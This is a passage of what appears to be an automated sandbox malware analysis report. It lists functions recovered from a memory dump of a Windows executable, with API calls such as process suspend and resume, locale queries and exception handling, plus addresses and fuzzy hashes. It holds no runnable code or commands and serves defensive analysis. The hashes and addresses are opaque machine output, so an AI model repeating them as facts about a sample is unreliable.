                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                        • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                        • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                        • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                        APIs
                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACDC
                                        • NtSuspendProcess.NTDLL(00000000), ref: 0041ACE9
                                        • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseHandleOpenSuspend
                                        • String ID:
                                        • API String ID: 1999457699-0
                                        • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                        • Instruction ID: 2f9544719979d624048292b5ab27ab43be47c8216fe5e38c5e6db7c07fdef43b
                                        • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                        • Instruction Fuzzy Hash: 36D0A733505132638221176A7C0CC87EE6CDFC1EB37024136F805C3220DE30C88186F4
                                        APIs
                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041AD08
                                        • NtResumeProcess.NTDLL(00000000), ref: 0041AD15
                                        • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseHandleOpenResume
                                        • String ID:
                                        • API String ID: 3614150671-0
                                        • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                        • Instruction ID: 37c2ac379339410306f7c92c5038f8fbeac8a1766455cc2515cdfea107740f35
                                        • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                        • Instruction Fuzzy Hash: 3AD05E32504121638220176A7C0C887EEA9DBC5AB37024236F804C26219A24C841C6A4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                        • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                        • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                        • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: GetLocaleInfoEx
                                        • API String ID: 2299586839-2904428671
                                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                        • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                        • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                        • Instruction ID: 147a43d4a8953c0e587c79f7e81ca7cf09075d603a4ca368f499ea5921ccbf25
                                        • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                        • Instruction Fuzzy Hash: DB026D71E002199FEF14CFA9C8806AEBBF1FF88314F25826AD919E7354D774A941CB84
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520DD,?,?,00000008,?,?,00455422,00000000), ref: 0045230F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                        • Instruction ID: 977e517564c3c3d0049d1222f3e9a6889a5c410b4df8a0f985261284c0187219
                                        • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                        • Instruction Fuzzy Hash: D2B18E311106088FD715CF28C586B567BE0FF06325F25869AEC99CF2A2C379E986CB44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                        • Instruction ID: 7b48c7cdb8adeeef677579d9f9868b7c31ff68b1fdc55a4cfb84755b90803176
                                        • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                        • Instruction Fuzzy Hash: 7F02B3727083014BD714DF29D95272EF3E2BFCC718F19592EF4859B381DA78A9058B86
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                        • String ID:
                                        • API String ID: 1663032902-0
                                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                        • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                        • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                        • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                        • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                        • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale_abort_free
                                        • String ID:
                                        • API String ID: 2692324296-0
                                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                        • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                        • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                        • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                        • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                        • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                        APIs
                                          • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-00471558,?,0044226B,00000000,0046DAC0,0000000C,00442226,0000000A,?,?,00448749,0000000A,?,00446F84,00000001,00000364), ref: 00444AEB
                                        • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                        • String ID:
                                        • API String ID: 1272433827-0
                                        • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                        • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                        • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                        • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                        • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                        • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                        • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                        • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                        • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                        • Instruction Fuzzy Hash:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: BG3i@
                                        • API String ID: 0-2407888476
                                        • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                        • Instruction ID: 1d57165ebf75e2395586178747a5147ed71ba924114eacc5dbe4d8b8235841a2
                                        • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                        • Instruction Fuzzy Hash: CF615771600605AADB386A2898D6BBF63A6EB4D718F10391BE543FB3C1D71DDD42831E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                        • Instruction ID: b96fbfb60640764a27c773ebaff073e85ef5750e910638ac9767c22e4461be8a
                                        • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                        • Instruction Fuzzy Hash: 485168716006045BDB34466885DA7BF6B959B0E704F18352FE48AFB382C61EEE02975E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                        • Instruction ID: 2dad8dda13a96ac29719e0110185aa8107b7b917685da963ee6e6edef41cb95d
                                        • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                        • Instruction Fuzzy Hash: C3416576A183158FC314CF29D18061BFBE1FBC8314F568A2EF99693350D679E980CB86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
